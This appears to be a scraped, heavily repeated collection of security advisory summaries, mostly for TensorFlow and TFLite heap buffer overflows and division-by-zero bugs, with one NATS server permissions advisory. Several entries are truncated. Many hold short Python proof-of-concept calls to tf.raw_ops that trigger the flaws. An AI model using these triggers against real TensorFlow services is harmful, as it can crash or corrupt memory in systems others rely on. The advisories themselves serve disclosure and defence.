If the splits argument of RaggedBincount does not specify a valid SparseTensor, then an attacker can trigger a heap buffer overflow: import tensorflow as tf tf.raw_ops.RaggedBincount(splits=[0], values=[1,1,1,1,1], size=5, weights=[1,2,3,4], binary_output=False)

Heap buffer overflow in `QuantizedResizeBilinear`

An attacker can cause a heap buffer overflow in QuantizedResizeBilinear by passing in invalid thresholds for the quantization: import tensorflow as tf images = tf.constant([], shape=[0], dtype=tf.qint32) size = tf.constant([], shape=[0], dtype=tf.int32) min = tf.constant([], dtype=tf.float32) max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max, align_corners=False, half_pixel_centers=False)

Heap buffer overflow in `QuantizedResizeBilinear`

An attacker can cause a heap buffer overflow in QuantizedResizeBilinear by passing in invalid thresholds for the quantization: import tensorflow as tf images = tf.constant([], shape=[0], dtype=tf.qint32) size = tf.constant([], shape=[0], dtype=tf.int32) min = tf.constant([], dtype=tf.float32) max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max, align_corners=False, half_pixel_centers=False)

Heap buffer overflow in `QuantizedResizeBilinear`

An attacker can cause a heap buffer overflow in QuantizedResizeBilinear by passing in invalid thresholds for the quantization: import tensorflow as tf images = tf.constant([], shape=[0], dtype=tf.qint32) size = tf.constant([], shape=[0], dtype=tf.int32) min = tf.constant([], dtype=tf.float32) max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max, align_corners=False, half_pixel_centers=False)

Heap buffer overflow in `QuantizedReshape`

An attacker can cause a heap buffer overflow in QuantizedReshape by passing in invalid thresholds for the quantization: import tensorflow as tf tensor = tf.constant([], dtype=tf.qint32) shape = tf.constant([], dtype=tf.int32) input_min = tf.constant([], dtype=tf.float32) input_max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedReshape(tensor=tensor, shape=shape, input_min=input_min, input_max=input_max)

Heap buffer overflow in `QuantizedReshape`

An attacker can cause a heap buffer overflow in QuantizedReshape by passing in invalid thresholds for the quantization: import tensorflow as tf tensor = tf.constant([], dtype=tf.qint32) shape = tf.constant([], dtype=tf.int32) input_min = tf.constant([], dtype=tf.float32) input_max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedReshape(tensor=tensor, shape=shape, input_min=input_min, input_max=input_max)

Heap buffer overflow in `QuantizedReshape`

An attacker can cause a heap buffer overflow in QuantizedReshape by passing in invalid thresholds for the quantization: import tensorflow as tf tensor = tf.constant([], dtype=tf.qint32) shape = tf.constant([], dtype=tf.int32) input_min = tf.constant([], dtype=tf.float32) input_max = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedReshape(tensor=tensor, shape=shape, input_min=input_min, input_max=input_max)

Heap buffer overflow in `QuantizedMul`

An attacker can cause a heap buffer overflow in QuantizedMul by passing in invalid thresholds for the quantization: import tensorflow as tf x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) min_x = tf.constant([], dtype=tf.float32) max_x = tf.constant([], dtype=tf.float32) min_y = tf.constant([], dtype=tf.float32) max_y = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Heap buffer overflow in `QuantizedMul`

An attacker can cause a heap buffer overflow in QuantizedMul by passing in invalid thresholds for the quantization: import tensorflow as tf x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) min_x = tf.constant([], dtype=tf.float32) max_x = tf.constant([], dtype=tf.float32) min_y = tf.constant([], dtype=tf.float32) max_y = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Heap buffer overflow in `QuantizedMul`

An attacker can cause a heap buffer overflow in QuantizedMul by passing in invalid thresholds for the quantization: import tensorflow as tf x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8) min_x = tf.constant([], dtype=tf.float32) max_x = tf.constant([], dtype=tf.float32) min_y = tf.constant([], dtype=tf.float32) max_y = tf.constant([], dtype=tf.float32) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Heap buffer overflow in `MaxPoolGrad`

The implementation of tf.raw_ops.MaxPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPoolGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding, explicit_paddings=[])

Heap buffer overflow in `MaxPoolGrad`

The implementation of tf.raw_ops.MaxPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPoolGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding, explicit_paddings=[])

Heap buffer overflow in `MaxPoolGrad`

The implementation of tf.raw_ops.MaxPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPoolGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding, explicit_paddings=[])

Heap buffer overflow in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad is vulnerable to a heap buffer overflow: import tensorflow as tf values = [0.01] * 11 orig_input = tf.constant(values, shape=[11, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, …

Heap buffer overflow in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad is vulnerable to a heap buffer overflow: import tensorflow as tf values = [0.01] * 11 orig_input = tf.constant(values, shape=[11, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, …

Heap buffer overflow in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad is vulnerable to a heap buffer overflow: import tensorflow as tf values = [0.01] * 11 orig_input = tf.constant(values, shape=[11, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([0.01], shape=[1, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, …

Heap buffer overflow in `FractionalAvgPoolGrad`

The implementation of tf.raw_ops.FractionalAvgPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64) out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64) row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalAvgPoolGrad( orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False)

Heap buffer overflow in `FractionalAvgPoolGrad`

The implementation of tf.raw_ops.FractionalAvgPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64) out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64) row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalAvgPoolGrad( orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False)

Heap buffer overflow in `FractionalAvgPoolGrad`

The implementation of tf.raw_ops.FractionalAvgPoolGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64) out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64) row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalAvgPoolGrad( orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False)

Heap buffer overflow in `Conv3DBackprop*`

Missing validation between arguments to tf.raw_ops.Conv3DBackprop* operations can result in heap buffer overflows: import tensorflow as tf input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[4, 1, 6, 1, 1], dtype=tf.float32) out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, …

Heap buffer overflow in `Conv3DBackprop*`

Missing validation between arguments to tf.raw_ops.Conv3DBackprop* operations can result in heap buffer overflows: import tensorflow as tf input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[4, 1, 6, 1, 1], dtype=tf.float32) out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, …

Heap buffer overflow in `Conv3DBackprop*`

Missing validation between arguments to tf.raw_ops.Conv3DBackprop* operations can result in heap buffer overflows: import tensorflow as tf input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32) filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[4, 1, 6, 1, 1], dtype=tf.float32) out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, …

Heap buffer overflow in `Conv2DBackpropFilter`

An attacker can cause a heap buffer overflow to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([386.078431372549, 386.07843139643234], shape=[1, 1, 1, 2], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 49, 1], use_cudnn_on_gpu=True, padding='VALID', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] ) Alternatively, passing empty tensors also results in similar behavior: import tensorflow as …

Heap buffer overflow in `Conv2DBackpropFilter`

An attacker can cause a heap buffer overflow to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([386.078431372549, 386.07843139643234], shape=[1, 1, 1, 2], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 49, 1], use_cudnn_on_gpu=True, padding='VALID', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] ) Alternatively, passing empty tensors also results in similar behavior: import tensorflow as …

Heap buffer overflow in `Conv2DBackpropFilter`

An attacker can cause a heap buffer overflow to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([386.078431372549, 386.07843139643234], shape=[1, 1, 1, 2], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 66, 49, 1], use_cudnn_on_gpu=True, padding='VALID', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] ) Alternatively, passing empty tensors also results in similar behavior: import tensorflow as …

Heap buffer overflow in `BandedTriangularSolve`

An attacker can trigger a heap buffer overflow in Eigen implementation of tf.raw_ops.BandedTriangularSolve: import tensorflow as tf import numpy as np matrix_array = np.array([]) matrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array,(0,1)),dtype=tf.float32) rhs_array = np.array([1,1]) rhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array,(1,2)),dtype=tf.float32) tf.raw_ops.BandedTriangularSolve(matrix=matrix_tensor,rhs=rhs_tensor)

Heap buffer overflow in `BandedTriangularSolve`

An attacker can trigger a heap buffer overflow in Eigen implementation of tf.raw_ops.BandedTriangularSolve: import tensorflow as tf import numpy as np matrix_array = np.array([]) matrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array,(0,1)),dtype=tf.float32) rhs_array = np.array([1,1]) rhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array,(1,2)),dtype=tf.float32) tf.raw_ops.BandedTriangularSolve(matrix=matrix_tensor,rhs=rhs_tensor)

Heap buffer overflow in `BandedTriangularSolve`

An attacker can trigger a heap buffer overflow in Eigen implementation of tf.raw_ops.BandedTriangularSolve: import tensorflow as tf import numpy as np matrix_array = np.array([]) matrix_tensor = tf.convert_to_tensor(np.reshape(matrix_array,(0,1)),dtype=tf.float32) rhs_array = np.array([1,1]) rhs_tensor = tf.convert_to_tensor(np.reshape(rhs_array,(1,2)),dtype=tf.float32) tf.raw_ops.BandedTriangularSolve(matrix=matrix_tensor,rhs=rhs_tensor)

Heap buffer overflow in `AvgPool3DGrad`

The implementation of tf.raw_ops.AvgPool3DGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_shape = tf.constant([10, 6, 3, 7, 7], shape=[5], dtype=tf.int32) grad = tf.constant([0.01, 0, 0], shape=[3, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.AvgPool3DGrad( orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides, padding=padding)

Heap buffer overflow in `AvgPool3DGrad`

The implementation of tf.raw_ops.AvgPool3DGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_shape = tf.constant([10, 6, 3, 7, 7], shape=[5], dtype=tf.int32) grad = tf.constant([0.01, 0, 0], shape=[3, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.AvgPool3DGrad( orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides, padding=padding)

Heap buffer overflow in `AvgPool3DGrad`

The implementation of tf.raw_ops.AvgPool3DGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_shape = tf.constant([10, 6, 3, 7, 7], shape=[5], dtype=tf.int32) grad = tf.constant([0.01, 0, 0], shape=[3, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.AvgPool3DGrad( orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides, padding=padding)

Heap buffer overflow caused by rounding

An attacker can trigger a heap buffer overflow in tf.raw_ops.QuantizedResizeBilinear by manipulating input values so that float rounding results in off-by-one error in accessing image elements: import tensorflow as tf l = [256, 328, 361, 17, 361, 361, 361, 361, 361, 361, 361, 361, 361, 361, 384] images = tf.constant(l, shape=[1, 1, 15, 1], dtype=tf.qint32) size = tf.constant([12, 6], shape=[2], dtype=tf.int32) min = tf.constant(80.22522735595703) max = tf.constant(80.39215850830078) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, …

Heap buffer overflow caused by rounding

An attacker can trigger a heap buffer overflow in tf.raw_ops.QuantizedResizeBilinear by manipulating input values so that float rounding results in off-by-one error in accessing image elements: import tensorflow as tf l = [256, 328, 361, 17, 361, 361, 361, 361, 361, 361, 361, 361, 361, 361, 384] images = tf.constant(l, shape=[1, 1, 15, 1], dtype=tf.qint32) size = tf.constant([12, 6], shape=[2], dtype=tf.int32) min = tf.constant(80.22522735595703) max = tf.constant(80.39215850830078) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, …

Heap buffer overflow caused by rounding

An attacker can trigger a heap buffer overflow in tf.raw_ops.QuantizedResizeBilinear by manipulating input values so that float rounding results in off-by-one error in accessing image elements: import tensorflow as tf l = [256, 328, 361, 17, 361, 361, 361, 361, 361, 361, 361, 361, 361, 361, 384] images = tf.constant(l, shape=[1, 1, 15, 1], dtype=tf.qint32) size = tf.constant([12, 6], shape=[2], dtype=tf.int32) min = tf.constant(80.22522735595703) max = tf.constant(80.39215850830078) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, …

Heap buffer overflow and undefined behavior in `FusedBatchNorm`

The implementation of tf.raw_ops.FusedBatchNorm is vulnerable to a heap buffer overflow: import tensorflow as tf x = tf.zeros([10, 10, 10, 6], dtype=tf.float32) scale = tf.constant([0.0], shape=[1], dtype=tf.float32) offset = tf.constant([0.0], shape=[1], dtype=tf.float32) mean = tf.constant([0.0], shape=[1], dtype=tf.float32) variance = tf.constant([0.0], shape=[1], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training) If the tensors are empty, the …

Heap buffer overflow and undefined behavior in `FusedBatchNorm`

The implementation of tf.raw_ops.FusedBatchNorm is vulnerable to a heap buffer overflow: import tensorflow as tf x = tf.zeros([10, 10, 10, 6], dtype=tf.float32) scale = tf.constant([0.0], shape=[1], dtype=tf.float32) offset = tf.constant([0.0], shape=[1], dtype=tf.float32) mean = tf.constant([0.0], shape=[1], dtype=tf.float32) variance = tf.constant([0.0], shape=[1], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training) If the tensors are empty, the …

Heap buffer overflow and undefined behavior in `FusedBatchNorm`

The implementation of tf.raw_ops.FusedBatchNorm is vulnerable to a heap buffer overflow: import tensorflow as tf x = tf.zeros([10, 10, 10, 6], dtype=tf.float32) scale = tf.constant([0.0], shape=[1], dtype=tf.float32) offset = tf.constant([0.0], shape=[1], dtype=tf.float32) mean = tf.constant([0.0], shape=[1], dtype=tf.float32) variance = tf.constant([0.0], shape=[1], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training) If the tensors are empty, the …

github.com/nats-io/nats-server/ Import token permissions checking not enforced

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2021-3127.txt) Problem Description The NATS server provides for Subjects which are namespaced by Account; all Subjects are supposed to be private to an account, with an Export/Import system used to grant cross-account access to some Subjects. Some Exports are public, such that anyone can import the relevant subjects, and some Exports are private, such that the Import requires a token JWT to prove permission. The JWT …

github.com/nats-io/nats-server/ Import token permissions checking not enforced

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2021-3127.txt) Problem Description The NATS server provides for Subjects which are namespaced by Account; all Subjects are supposed to be private to an account, with an Export/Import system used to grant cross-account access to some Subjects. Some Exports are public, such that anyone can import the relevant subjects, and some Exports are private, such that the Import requires a token JWT to prove permission. The JWT …

Division by zero in TFLite's implementation of `TransposeConv`

The optimized implementation of the TransposeConv TFLite operator is vulnerable to a division by zero error: int height_col = (height + pad_t + pad_b - filter_h) / stride_h + 1; int width_col = (width + pad_l + pad_r - filter_w) / stride_w + 1; An attacker can craft a model such that stride_{h,w} values are 0. Code calling this function must validate these arguments.

Division by zero in TFLite's implementation of `TransposeConv`

The optimized implementation of the TransposeConv TFLite operator is vulnerable to a division by zero error: int height_col = (height + pad_t + pad_b - filter_h) / stride_h + 1; int width_col = (width + pad_l + pad_r - filter_w) / stride_w + 1; An attacker can craft a model such that stride_{h,w} values are 0. Code calling this function must validate these arguments.

Division by zero in TFLite's implementation of `TransposeConv`

The optimized implementation of the TransposeConv TFLite operator is vulnerable to a division by zero error: int height_col = (height + pad_t + pad_b - filter_h) / stride_h + 1; int width_col = (width + pad_l + pad_r - filter_w) / stride_w + 1; An attacker can craft a model such that stride_{h,w} values are 0. Code calling this function must validate these arguments.

Division by zero in TFLite's implementation of `SpaceToDepth`

The Prepare step of the SpaceToDepth TFLite operator does not check for 0 before division. const int block_size = params->block_size; const int input_height = input->dims->data[1]; const int input_width = input->dims->data[2]; int output_height = input_height / block_size; int output_width = input_width / block_size; An attacker can craft a model such that params->block_size would be zero.

Division by zero in TFLite's implementation of `SpaceToDepth`

The Prepare step of the SpaceToDepth TFLite operator does not check for 0 before division. const int block_size = params->block_size; const int input_height = input->dims->data[1]; const int input_width = input->dims->data[2]; int output_height = input_height / block_size; int output_width = input_width / block_size; An attacker can craft a model such that params->block_size would be zero.

Division by zero in TFLite's implementation of `SpaceToDepth`

The Prepare step of the SpaceToDepth TFLite operator does not check for 0 before division. const int block_size = params->block_size; const int input_height = input->dims->data[1]; const int input_width = input->dims->data[2]; int output_height = input_height / block_size; int output_width = input_width / block_size; An attacker can craft a model such that params->block_size would be zero.

Division by zero in TFLite's implementation of `SpaceToBatchNd`

The implementation of the SpaceToBatchNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, final_dim_size % block_shape[dim], 0); output_size->data[dim + 1] = final_dim_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.

Division by zero in TFLite's implementation of `SpaceToBatchNd`

The implementation of the SpaceToBatchNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, final_dim_size % block_shape[dim], 0); output_size->data[dim + 1] = final_dim_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.

Division by zero in TFLite's implementation of `SpaceToBatchNd`

The implementation of the SpaceToBatchNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, final_dim_size % block_shape[dim], 0); output_size->data[dim + 1] = final_dim_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.

Division by zero in TFLite's implementation of `OneHot`

The implementation of the OneHot TFLite operator is vulnerable to a division by zero error: int prefix_dim_size = 1; for (int i = 0; i < op_context.axis; ++i) { prefix_dim_size *= op_context.indices->dims->data[i]; } const int suffix_dim_size = NumElements(op_context.indices) / prefix_dim_size; An attacker can craft a model such that at least one of the dimensions of indices would be 0. In turn, the prefix_dim_size value would become 0.

Division by zero in TFLite's implementation of `OneHot`

The implementation of the OneHot TFLite operator is vulnerable to a division by zero error: int prefix_dim_size = 1; for (int i = 0; i < op_context.axis; ++i) { prefix_dim_size *= op_context.indices->dims->data[i]; } const int suffix_dim_size = NumElements(op_context.indices) / prefix_dim_size; An attacker can craft a model such that at least one of the dimensions of indices would be 0. In turn, the prefix_dim_size value would become 0.

Division by zero in TFLite's implementation of `OneHot`

The implementation of the OneHot TFLite operator is vulnerable to a division by zero error: int prefix_dim_size = 1; for (int i = 0; i < op_context.axis; ++i) { prefix_dim_size *= op_context.indices->dims->data[i]; } const int suffix_dim_size = NumElements(op_context.indices) / prefix_dim_size; An attacker can craft a model such that at least one of the dimensions of indices would be 0. In turn, the prefix_dim_size value would become 0.

Division by zero in TFLite's implementation of `GatherNd`

The reference implementation of the GatherNd TFLite operator is vulnerable to a division by zero error: ret.dims_to_count[i] = remain_flat_size / params_shape.Dims(i); An attacker can craft a model such that params input would be an empty tensor. In turn, params_shape.Dims(.) would be zero, in at least one dimension.

Division by zero in TFLite's implementation of `DepthToSpace`

The implementation of the DepthToSpace TFLite operator is vulnerable to a division by zero error: const int block_size = params->block_size; … const int input_channels = input->dims->data[3]; … int output_channels = input_channels / block_size / block_size; An attacker can craft a model such that params->block_size is 0.

Division by zero in TFLite's implementation of `BatchToSpaceNd`

The implementation of the BatchToSpaceNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, output_batch_size % block_shape[dim], 0); output_batch_size = output_batch_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.

Division by zero in TFLite's implementation of `BatchToSpaceNd`

The implementation of the BatchToSpaceNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, output_batch_size % block_shape[dim], 0); output_batch_size = output_batch_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.

Division by zero in TFLite's implementation of `BatchToSpaceNd`

The implementation of the BatchToSpaceNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, output_batch_size % block_shape[dim], 0); output_batch_size = output_batch_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.

Division by zero in padding computation in TFLite

The TFLite computation for size of output after padding, ComputeOutSize, does not check that the stride argument is not 0 before doing the division. inline int ComputeOutSize(TfLitePadding padding, int image_size, int filter_size, int stride, int dilation_rate = 1) { int effective_filter_size = (filter_size - 1) * dilation_rate + 1; switch (padding) { case kTfLitePaddingSame: return (image_size + stride - 1) / stride; case kTfLitePaddingValid: return (image_size + stride - effective_filter_size) …

Division by zero in padding computation in TFLite

The TFLite computation for size of output after padding, ComputeOutSize, does not check that the stride argument is not 0 before doing the division. inline int ComputeOutSize(TfLitePadding padding, int image_size, int filter_size, int stride, int dilation_rate = 1) { int effective_filter_size = (filter_size - 1) * dilation_rate + 1; switch (padding) { case kTfLitePaddingSame: return (image_size + stride - 1) / stride; case kTfLitePaddingValid: return (image_size + stride - effective_filter_size) …

Division by zero in padding computation in TFLite

The TFLite computation for size of output after padding, ComputeOutSize, does not check that the stride argument is not 0 before doing the division. inline int ComputeOutSize(TfLitePadding padding, int image_size, int filter_size, int stride, int dilation_rate = 1) { int effective_filter_size = (filter_size - 1) * dilation_rate + 1; switch (padding) { case kTfLitePaddingSame: return (image_size + stride - 1) / stride; case kTfLitePaddingValid: return (image_size + stride - effective_filter_size) …

Division by zero in `Conv3D`

A malicious user could trigger a division by 0 in Conv3D implementation: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1])

Division by zero in `Conv3D`

